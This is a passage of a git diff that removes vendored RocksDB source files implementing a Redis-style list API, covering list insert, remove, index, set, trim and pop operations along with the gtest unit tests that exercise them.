-  RedisListIterator it(data);
-  it.Reserve(it.Size());
-  while (!it.Done()) {
-    it.GetCurrent(&elem);
-
-    if (elem == value && numSkipped < num) {
-      // Drop this item if desired
-      it.Skip();
-      ++numSkipped;
-    } else {
-      // Otherwise keep the item and proceed as normal
-      it.Push();
-    }
-  }
-
-  // Put the result back to the database
-  db_->Put(put_option_, key, it.WriteResult());
-
-  // Return the number of elements removed
-  return numSkipped;
-}
-
-
-// Remove the last "num" occurrences of value in (list: key).
-// TODO: I traverse the list 2x. Make faster. Might require MergeOperator.
-//   : throws RedisListException
-int RedisLists::RemoveLast(const std::string& key, int32_t num,
-                           const std::string& value) {
-  // Ensure that the number is positive
-  assert(num >= 0);
-
-  // Extract the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Temporary variable to hold the "current element" in the blocks below
-  Slice elem;
-
-  // Count the total number of occurrences of value
-  int totalOccs = 0;
-  for (RedisListIterator it(data); !it.Done(); it.Skip()) {
-    it.GetCurrent(&elem);
-    if (elem == value) {
-      ++totalOccs;
-    }
-  }
-
-  // Construct an iterator to the data. Reserve enough space for the result.
-  RedisListIterator it(data);
-  int bytesRemoved = std::min(num,totalOccs)*it.SizeOf(value);
-  it.Reserve(it.Size() - bytesRemoved);
-
-  // Traverse the list, appending all but the desired occurrences of value.
-  // Note: "Drop the last k occurrences" is equivalent to
-  //  "keep only the first n-k occurrences", where n is total occurrences.
-  int numKept = 0;          // Keep track of the number of times value is kept
-  while(!it.Done()) {
-    it.GetCurrent(&elem);
-
-    // If we are within the deletion range and equal to value, drop it.
-    // Otherwise, append/keep/push it.
-    if (elem == value) {
-      if (numKept < totalOccs - num) {
-        it.Push();
-        ++numKept;
-      } else {
-        it.Skip();
-      }
-    } else {
-      // Always append the others
-      it.Push();
-    }
-  }
-
-  // Put the result back to the database
-  db_->Put(put_option_, key, it.WriteResult());
-
-  // Return the number of elements removed
-  return totalOccs - numKept;
-}
-
-/// Private functions
-
-// Insert element value into (list: key), right before/after
-//  the first occurrence of pivot
-//   : throws RedisListException
-int RedisLists::Insert(const std::string& key, const std::string& pivot,
-                       const std::string& value, bool insert_after) {
-  // Get the original list data
-  std::string data;
-  db_->Get(get_option_, key, &data);
-
-  // Construct an iterator to the data and reserve enough space for result.
-  RedisListIterator it(data);
-  it.Reserve(it.Size() + it.SizeOf(value));
-
-  // Iterate through the list until we find the element we want
-  Slice elem;
-  bool found = false;
-  while(!it.Done() && !found) {
-    it.GetCurrent(&elem);
-
-    // When we find the element, insert the element and mark found
-    if (elem == pivot) {                // Found it!
-      found = true;
-      if (insert_after == true) {       // Skip one more, if inserting after it
-        it.Push();
-      }
-      it.InsertElement(value);
-    } else {
-      it.Push();
-    }
-
-  }
-
-  // Put the data (string) into the database
-  if (found) {
-    db_->Put(put_option_, key, it.WriteResult());
-  }
-
-  // Returns the new (possibly unchanged) length of the list
-  return it.Length();
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists.h b/thirdparty/rocksdb/utilities/redis/redis_lists.h
deleted file mode 100644
index 6c8b955..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/**
- * A (persistent) Redis API built using the rocksdb backend.
- * Implements Redis Lists as described on: http://redis.io/commands#list
- *
- * @throws All functions may throw a RedisListException
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- * Copyright 2013 Facebook
- */
-
-#ifndef ROCKSDB_LITE
-#pragma once
-
-#include <string>
-#include "rocksdb/db.h"
-#include "redis_list_iterator.h"
-#include "redis_list_exception.h"
-
-namespace rocksdb {
-
-/// The Redis functionality (see http://redis.io/commands#list)
-/// All functions may THROW a RedisListException
-class RedisLists {
- public: // Constructors / Destructors
-  /// Construct a new RedisLists database, with name/path of db.
-  /// Will clear the database on open iff destructive is true (default false).
-  /// Otherwise, it will restore saved changes.
-  /// May throw RedisListException
-  RedisLists(const std::string& db_path,
-             Options options, bool destructive = false);
-
- public:  // Accessors
-  /// The number of items in (list: key)
-  int Length(const std::string& key);
-
-  /// Search the list for the (index)'th item (0-based) in (list:key)
-  /// A negative index indicates: "from end-of-list"
-  /// If index is within range: return true, and return the value in *result.
-  /// If (index < -length OR index>=length), then index is out of range:
-  ///   return false (and *result is left unchanged)
-  /// May throw RedisListException
-  bool Index(const std::string& key, int32_t index,
-             std::string* result);
-
-  /// Return (list: key)[first..last] (inclusive)
-  /// May throw RedisListException
-  std::vector<std::string> Range(const std::string& key,
-                                 int32_t first, int32_t last);
-
-  /// Prints the entire (list: key), for debugging.
-  void Print(const std::string& key);
-
- public: // Insert/Update
-  /// Insert value before/after pivot in (list: key). Return the length.
-  /// May throw RedisListException
-  int InsertBefore(const std::string& key, const std::string& pivot,
-                   const std::string& value);
-  int InsertAfter(const std::string& key, const std::string& pivot,
-                  const std::string& value);
-
-  /// Push / Insert value at beginning/end of the list. Return the length.
-  /// May throw RedisListException
-  int PushLeft(const std::string& key, const std::string& value);
-  int PushRight(const std::string& key, const std::string& value);
-
-  /// Set (list: key)[idx] = val. Return true on success, false on fail
-  /// May throw RedisListException
-  bool Set(const std::string& key, int32_t index, const std::string& value);
-
- public: // Delete / Remove / Pop / Trim
-  /// Trim (list: key) so that it will only contain the indices from start..stop
-  /// Returns true on success
-  /// May throw RedisListException
-  bool Trim(const std::string& key, int32_t start, int32_t stop);
-
-  /// If list is empty, return false and leave *result unchanged.
-  /// Else, remove the first/last elem, store it in *result, and return true
-  bool PopLeft(const std::string& key, std::string* result);  // First
-  bool PopRight(const std::string& key, std::string* result); // Last
-
-  /// Remove the first (or last) num occurrences of value from the list (key)
-  /// Return the number of elements removed.
-  /// May throw RedisListException
-  int Remove(const std::string& key, int32_t num,
-             const std::string& value);
-  int RemoveFirst(const std::string& key, int32_t num,
-                  const std::string& value);
-  int RemoveLast(const std::string& key, int32_t num,
-                 const std::string& value);
-
- private: // Private Functions
-  /// Calls InsertBefore or InsertAfter
-  int Insert(const std::string& key, const std::string& pivot,
-             const std::string& value, bool insert_after);
- private:
-  std::string db_name_;       // The actual database name/path
-  WriteOptions put_option_;
-  ReadOptions get_option_;
-
-  /// The backend rocksdb database.
-  /// Map : key --> list
-  ///       where a list is a sequence of elements
-  ///       and an element is a 4-byte integer (n), followed by n bytes of data
-  std::unique_ptr<DB> db_;
-};
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc b/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc
deleted file mode 100644
index 22acdff..0000000
--- a/thirdparty/rocksdb/utilities/redis/redis_lists_test.cc
+++ /dev/null
@@ -1,894 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-/**
- * A test harness for the Redis API built on rocksdb.
- *
- * USAGE: Build with: "make redis_test" (in rocksdb directory).
- *        Run unit tests with: "./redis_test"
- *        Manual/Interactive user testing: "./redis_test -m"
- *        Manual user testing + restart database: "./redis_test -m -d"
- *
- * TODO:  Add LARGE random test cases to verify efficiency and scalability
- *
- * @author Deon Nicholas (dnicholas@fb.com)
- */
-
-#ifndef ROCKSDB_LITE
-
-#include <iostream>
-#include <cctype>
-
-#include "redis_lists.h"
-#include "util/testharness.h"
-#include "util/random.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-
-class RedisListsTest : public testing::Test {
- public:
-  static const std::string kDefaultDbName;
-  static Options options;
-
-  RedisListsTest() {
-    options.create_if_missing = true;
-  }
-};
-
-const std::string RedisListsTest::kDefaultDbName =
-    test::TmpDir() + "/redis_lists_test";
-Options RedisListsTest::options = Options();
-
-// operator== and operator<< are defined below for vectors (lists)
-// Needed for ASSERT_EQ
-
-namespace {
-void AssertListEq(const std::vector<std::string>& result,
-                  const std::vector<std::string>& expected_result) {
-  ASSERT_EQ(result.size(), expected_result.size());
-  for (size_t i = 0; i < result.size(); ++i) {
-    ASSERT_EQ(result[i], expected_result[i]);
-  }
-}
-}  // namespace
-
-// PushRight, Length, Index, Range
-TEST_F(RedisListsTest, SimpleTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple PushRight (should return the new length each time)
-  ASSERT_EQ(redis.PushRight("k1", "v1"), 1);
-  ASSERT_EQ(redis.PushRight("k1", "v2"), 2);
-  ASSERT_EQ(redis.PushRight("k1", "v3"), 3);
-
-  // Check Length and Index() functions
-  ASSERT_EQ(redis.Length("k1"), 3);        // Check length
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v1");   // Check valid indices
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Check range function and vectors
-  std::vector<std::string> result = redis.Range("k1", 0, 2);   // Get the list
-  std::vector<std::string> expected_result(3);
-  expected_result[0] = "v1";
-  expected_result[1] = "v2";
-  expected_result[2] = "v3";
-  AssertListEq(result, expected_result);
-}
-
-// PushLeft, Length, Index, Range
-TEST_F(RedisListsTest, SimpleTest2) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple PushRight
-  ASSERT_EQ(redis.PushLeft("k1", "v3"), 1);
-  ASSERT_EQ(redis.PushLeft("k1", "v2"), 2);
-  ASSERT_EQ(redis.PushLeft("k1", "v1"), 3);
-
-  // Check Length and Index() functions
-  ASSERT_EQ(redis.Length("k1"), 3);        // Check length
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v1");   // Check valid indices
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Check range function and vectors
-  std::vector<std::string> result = redis.Range("k1", 0, 2);   // Get the list
-  std::vector<std::string> expected_result(3);
-  expected_result[0] = "v1";
-  expected_result[1] = "v2";
-  expected_result[2] = "v3";
-  AssertListEq(result, expected_result);
-}
-
-// Exhaustive test of the Index() function
-TEST_F(RedisListsTest, IndexTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Empty Index check (return empty and should not crash or edit tempv)
-  tempv = "yo";
-  ASSERT_TRUE(!redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "yo");
-  ASSERT_TRUE(!redis.Index("fda", 3, &tempv));
-  ASSERT_EQ(tempv, "yo");
-  ASSERT_TRUE(!redis.Index("random", -12391, &tempv));
-  ASSERT_EQ(tempv, "yo");
-
-  // Simple Pushes (will yield: [v6, v4, v4, v1, v2, v3]
-  redis.PushRight("k1", "v1");
-  redis.PushRight("k1", "v2");
-  redis.PushRight("k1", "v3");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v6");
-
-  // Simple, non-negative indices
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "v6");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "v1");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Negative indices
-  ASSERT_TRUE(redis.Index("k1", -6, &tempv));
-  ASSERT_EQ(tempv, "v6");
-  ASSERT_TRUE(redis.Index("k1", -5, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", -4, &tempv));
-  ASSERT_EQ(tempv, "v4");
-  ASSERT_TRUE(redis.Index("k1", -3, &tempv));
-  ASSERT_EQ(tempv, "v1");
-  ASSERT_TRUE(redis.Index("k1", -2, &tempv));
-  ASSERT_EQ(tempv, "v2");
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "v3");
-
-  // Out of bounds (return empty, no crash)
-  ASSERT_TRUE(!redis.Index("k1", 6, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", 123219, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", -7, &tempv));
-  ASSERT_TRUE(!redis.Index("k1", -129, &tempv));
-}
-
-
-// Exhaustive test of the Range() function
-TEST_F(RedisListsTest, RangeTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Simple Pushes (will yield: [v6, v4, v4, v1, v2, v3])
-  redis.PushRight("k1", "v1");
-  redis.PushRight("k1", "v2");
-  redis.PushRight("k1", "v3");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v4");
-  redis.PushLeft("k1", "v6");
-
-  // Sanity check (check the length;  make sure it's 6)
-  ASSERT_EQ(redis.Length("k1"), 6);
-
-  // Simple range
-  std::vector<std::string> res = redis.Range("k1", 1, 4);
-  ASSERT_EQ((int)res.size(), 4);
-  ASSERT_EQ(res[0], "v4");
-  ASSERT_EQ(res[1], "v4");
-  ASSERT_EQ(res[2], "v1");
-  ASSERT_EQ(res[3], "v2");
-
-  // Negative indices (i.e.: measured from the end)
-  res = redis.Range("k1", 2, -1);
-  ASSERT_EQ((int)res.size(), 4);
-  ASSERT_EQ(res[0], "v4");
-  ASSERT_EQ(res[1], "v1");
-  ASSERT_EQ(res[2], "v2");
-  ASSERT_EQ(res[3], "v3");
-
-  res = redis.Range("k1", -6, -4);
-  ASSERT_EQ((int)res.size(), 3);
-  ASSERT_EQ(res[0], "v6");
-  ASSERT_EQ(res[1], "v4");
-  ASSERT_EQ(res[2], "v4");
-
-  res = redis.Range("k1", -1, 5);
-  ASSERT_EQ((int)res.size(), 1);
-  ASSERT_EQ(res[0], "v3");
-
-  // Partial / Broken indices
-  res = redis.Range("k1", -3, 1000000);
-  ASSERT_EQ((int)res.size(), 3);
-  ASSERT_EQ(res[0], "v1");
-  ASSERT_EQ(res[1], "v2");
-  ASSERT_EQ(res[2], "v3");
-
-  res = redis.Range("k1", -1000000, 1);
-  ASSERT_EQ((int)res.size(), 2);
-  ASSERT_EQ(res[0], "v6");
-  ASSERT_EQ(res[1], "v4");
-
-  // Invalid indices
-  res = redis.Range("k1", 7, 9);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", -8, -7);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", 3, 2);
-  ASSERT_EQ((int)res.size(), 0);
-
-  res = redis.Range("k1", 5, -2);
-  ASSERT_EQ((int)res.size(), 0);
-
-  // Range matches Index
-  res = redis.Range("k1", -6, -4);
-  ASSERT_TRUE(redis.Index("k1", -6, &tempv));
-  ASSERT_EQ(tempv, res[0]);
-  ASSERT_TRUE(redis.Index("k1", -5, &tempv));
-  ASSERT_EQ(tempv, res[1]);
-  ASSERT_TRUE(redis.Index("k1", -4, &tempv));
-  ASSERT_EQ(tempv, res[2]);
-
-  // Last check
-  res = redis.Range("k1", 0, -6);
-  ASSERT_EQ((int)res.size(), 1);
-  ASSERT_EQ(res[0], "v6");
-}
-
-// Exhaustive test for InsertBefore(), and InsertAfter()
-TEST_F(RedisListsTest, InsertTest) {
-  RedisLists redis(kDefaultDbName, options, true);
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Insert on empty list (return 0, and do not crash)
-  ASSERT_EQ(redis.InsertBefore("k1", "non-exist", "a"), 0);
-  ASSERT_EQ(redis.InsertAfter("k1", "other-non-exist", "c"), 0);
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Push some preliminary stuff [g, f, e, d, c, b, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "b");
-  redis.PushLeft("k1", "c");
-  redis.PushLeft("k1", "d");
-  redis.PushLeft("k1", "e");
-  redis.PushLeft("k1", "f");
-  redis.PushLeft("k1", "g");
-  ASSERT_EQ(redis.Length("k1"), 7);
-
-  // Test InsertBefore
-  int newLength = redis.InsertBefore("k1", "e", "hello");
-  ASSERT_EQ(newLength, 8);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "hello");
-
-  // Test InsertAfter
-  newLength =  redis.InsertAfter("k1", "c", "bye");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "bye");
-
-  // Test bad value on InsertBefore
-  newLength = redis.InsertBefore("k1", "yo", "x");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test bad value on InsertAfter
-  newLength = redis.InsertAfter("k1", "xxxx", "y");
-  ASSERT_EQ(newLength, 9);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test InsertBefore beginning
-  newLength = redis.InsertBefore("k1", "g", "begggggggggggggggg");
-  ASSERT_EQ(newLength, 10);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Test InsertAfter end
-  newLength = redis.InsertAfter("k1", "a", "enddd");
-  ASSERT_EQ(newLength, 11);
-  ASSERT_EQ(redis.Length("k1"), newLength);
-
-  // Make sure nothing weird happened.
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "begggggggggggggggg");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "g");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "hello");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 7, &tempv));
-  ASSERT_EQ(tempv, "bye");
-  ASSERT_TRUE(redis.Index("k1", 8, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 9, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "enddd");
-}
-
-// Exhaustive test of Set function
-TEST_F(RedisListsTest, SetTest) {
-  RedisLists redis(kDefaultDbName, options, true);
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // Set on empty list (return false, and do not crash)
-  ASSERT_EQ(redis.Set("k1", 7, "a"), false);
-  ASSERT_EQ(redis.Set("k1", 0, "a"), false);
-  ASSERT_EQ(redis.Set("k1", -49, "cx"), false);
-  ASSERT_EQ(redis.Length("k1"), 0);
-
-  // Push some preliminary stuff [g, f, e, d, c, b, a]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "b");
-  redis.PushLeft("k1", "c");
-  redis.PushLeft("k1", "d");
-  redis.PushLeft("k1", "e");
-  redis.PushLeft("k1", "f");
-  redis.PushLeft("k1", "g");
-  ASSERT_EQ(redis.Length("k1"), 7);
-
-  // Test Regular Set
-  ASSERT_TRUE(redis.Set("k1", 0, "0"));
-  ASSERT_TRUE(redis.Set("k1", 3, "3"));
-  ASSERT_TRUE(redis.Set("k1", 6, "6"));
-  ASSERT_TRUE(redis.Set("k1", 2, "2"));
-  ASSERT_TRUE(redis.Set("k1", 5, "5"));
-  ASSERT_TRUE(redis.Set("k1", 1, "1"));
-  ASSERT_TRUE(redis.Set("k1", 4, "4"));
-
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "0");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "1");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "2");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "3");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "4");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "5");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "6");
-
-  // Set with negative indices
-  ASSERT_TRUE(redis.Set("k1", -7, "a"));
-  ASSERT_TRUE(redis.Set("k1", -4, "d"));
-  ASSERT_TRUE(redis.Set("k1", -1, "g"));
-  ASSERT_TRUE(redis.Set("k1", -5, "c"));
-  ASSERT_TRUE(redis.Set("k1", -2, "f"));
-  ASSERT_TRUE(redis.Set("k1", -6, "b"));
-  ASSERT_TRUE(redis.Set("k1", -3, "e"));
-
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "g");
-
-  // Bad indices (just out-of-bounds / off-by-one check)
-  ASSERT_EQ(redis.Set("k1", -8, "off-by-one in negative index"), false);
-  ASSERT_EQ(redis.Set("k1", 7, "off-by-one-error in positive index"), false);
-  ASSERT_EQ(redis.Set("k1", 43892, "big random index should fail"), false);
-  ASSERT_EQ(redis.Set("k1", -21391, "large negative index should fail"), false);
-
-  // One last check (to make sure nothing weird happened)
-  ASSERT_EQ(redis.Length("k1"), 7); // Size should not change
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "a");
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "b");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "c");
-  ASSERT_TRUE(redis.Index("k1", 3, &tempv));
-  ASSERT_EQ(tempv, "d");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "e");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "f");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "g");
-}
-
-// Testing Insert, Push, and Set, in a mixed environment
-TEST_F(RedisListsTest, InsertPushSetTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend]
-  // Also, check the return value sometimes (should return length)
-  int lengthCheck;
-  lengthCheck = redis.PushLeft("k1", "a");
-  ASSERT_EQ(lengthCheck, 1);
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  lengthCheck = redis.InsertAfter("k1", "a", "aftera");
-  ASSERT_EQ(lengthCheck , 4);
-  redis.InsertBefore("k1", "z", "newbegin");  // InsertBefore beginning of list
-  redis.InsertAfter("k1", "x", "newend");     // InsertAfter end of list
-
-  // Check
-  std::vector<std::string> res = redis.Range("k1", 0, -1); // Get the list
-  ASSERT_EQ((int)res.size(), 6);
-  ASSERT_EQ(res[0], "newbegin");
-  ASSERT_EQ(res[5], "newend");
-  ASSERT_EQ(res[3], "aftera");
-
-  // Testing duplicate values/pivots (multiple occurrences of 'a')
-  ASSERT_TRUE(redis.Set("k1", 0, "a"));     // [a, z, a, aftera, x, newend]
-  redis.InsertAfter("k1", "a", "happy");    // [a, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 1, &tempv));
-  ASSERT_EQ(tempv, "happy");
-  redis.InsertBefore("k1", "a", "sad");     // [sad, a, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "sad");
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "happy");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  redis.InsertAfter("k1", "a", "zz");         // [sad, a, zz, happy, z, a, aftera, ...]
-  ASSERT_TRUE(redis.Index("k1", 2, &tempv));
-  ASSERT_EQ(tempv, "zz");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "aftera");
-  ASSERT_TRUE(redis.Set("k1", 1, "nota"));    // [sad, nota, zz, happy, z, a, ...]
-  redis.InsertBefore("k1", "a", "ba");        // [sad, nota, zz, happy, z, ba, a, ...]
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "ba");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // We currently have: [sad, nota, zz, happy, z, ba, a, aftera, x, newend]
-  // redis.Print("k1");   // manually check
-
-  // Test Inserting before/after non-existent values
-  lengthCheck = redis.Length("k1"); // Ensure that the length doesn't change
-  ASSERT_EQ(lengthCheck, 10);
-  ASSERT_EQ(redis.InsertBefore("k1", "non-exist", "randval"), lengthCheck);
-  ASSERT_EQ(redis.InsertAfter("k1", "nothing", "a"), lengthCheck);
-  ASSERT_EQ(redis.InsertAfter("randKey", "randVal", "ranValue"), 0); // Empty
-  ASSERT_EQ(redis.Length("k1"), lengthCheck); // The length should not change
-
-  // Simply Test the Set() function
-  redis.Set("k1", 5, "ba2");
-  redis.InsertBefore("k1", "ba2", "beforeba2");
-  ASSERT_TRUE(redis.Index("k1", 4, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.Index("k1", 5, &tempv));
-  ASSERT_EQ(tempv, "beforeba2");
-  ASSERT_TRUE(redis.Index("k1", 6, &tempv));
-  ASSERT_EQ(tempv, "ba2");
-  ASSERT_TRUE(redis.Index("k1", 7, &tempv));
-  ASSERT_EQ(tempv, "a");
-
-  // We have: [sad, nota, zz, happy, z, beforeba2, ba2, a, aftera, x, newend]
-
-  // Set() with negative indices
-  redis.Set("k1", -1, "endprank");
-  ASSERT_TRUE(!redis.Index("k1", 11, &tempv));
-  ASSERT_TRUE(redis.Index("k1", 10, &tempv));
-  ASSERT_EQ(tempv, "endprank"); // Ensure Set worked correctly
-  redis.Set("k1", -11, "t");
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "t");
-
-  // Test out of bounds Set
-  ASSERT_EQ(redis.Set("k1", -12, "ssd"), false);
-  ASSERT_EQ(redis.Set("k1", 11, "sasd"), false);
-  ASSERT_EQ(redis.Set("k1", 1200, "big"), false);
-}
-
-// Testing Trim, Pop
-TEST_F(RedisListsTest, TrimPopTest) {
-  RedisLists redis(kDefaultDbName, options, true);   // Destructive
-
-  std::string tempv;  // Used below for all Index(), PopRight(), PopLeft()
-
-  // A series of pushes and insertions
-  // Will result in [newbegin, z, a, aftera, x, newend]
-  redis.PushLeft("k1", "a");
-  redis.PushLeft("k1", "z");
-  redis.PushRight("k1", "x");
-  redis.InsertBefore("k1", "z", "newbegin");    // InsertBefore start of list
-  redis.InsertAfter("k1", "x", "newend");       // InsertAfter end of list
-  redis.InsertAfter("k1", "a", "aftera");
-
-  // Simple PopLeft/Right test
-  ASSERT_TRUE(redis.PopLeft("k1", &tempv));
-  ASSERT_EQ(tempv, "newbegin");
-  ASSERT_EQ(redis.Length("k1"), 5);
-  ASSERT_TRUE(redis.Index("k1", 0, &tempv));
-  ASSERT_EQ(tempv, "z");
-  ASSERT_TRUE(redis.PopRight("k1", &tempv));
-  ASSERT_EQ(tempv, "newend");
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Index("k1", -1, &tempv));
-  ASSERT_EQ(tempv, "x");
-
-  // Now have: [z, a, aftera, x]
-
-  // Test Trim
-  ASSERT_TRUE(redis.Trim("k1", 0, -1));       // [z, a, aftera, x] (do nothing)
-  ASSERT_EQ(redis.Length("k1"), 4);
-  ASSERT_TRUE(redis.Trim("k1", 0, 2));                     // [z, a, aftera]
